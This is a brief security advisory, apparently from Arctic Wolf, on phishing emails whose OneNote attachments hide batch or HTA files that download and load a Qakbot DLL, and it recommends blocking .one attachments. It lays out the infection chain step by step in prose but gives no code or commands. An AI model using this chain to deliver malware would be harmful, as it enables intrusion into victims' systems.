Arctic Wolf has observed a significant increase in the number of malicious files delivered and opened via OneNote email attachments. Unlike malicious Word and Excel files, infected OneNote files do not require the security prompt asking the end-user to allow macros, thus increasing the chances of unknowingly running the malicious executable.
OneNote attachments are delivered via email with encouragement for the end-user to click on the button to download the attachment and view the document. The current malware iteration contains a link to open batch files which is placed behind the button. and when an unsuspecting user clicks on the view button, they end up clicking on the batch file which runs the malicious code.
The code in the malicious HTA file typically leverages a system process, such as mshta.exe or cmd.exe, to contact a malicious URL. This may be achieved using curl.exe or powershell.exe processes, in order to download the second stage malware. This second stage malware is often used by threat actors as a backdoor into the endpoint and network.
A common OneNote tactic may involve the following steps:
- OneNote attachment sent via email.
- User clicks to retrieve the attachment.
- HTA application launches curl.exe to malicious URL.
- A malicious DLL is downloaded and saved with an extension of .png or .jpg.
Note: The URL sometimes references a .gif despite saving a different extension locally.
- The downloaded malicious DLL is loaded via rundll32.exe.
- Qakbot infection is established.
Recommendation #1: Block .one Attachments via Email Gateway
We strongly recommend blocking all .one attachments at your email gateway. If using Microsoft 365, please reference the Microsoft documentation on how to accomplish this. You will need to manually add the .one extension after enabling the “common attachments filter” option in the “Anti-malware” policy in the Office 365 Defender portal. If using another email gateway solution, consult with your vendor.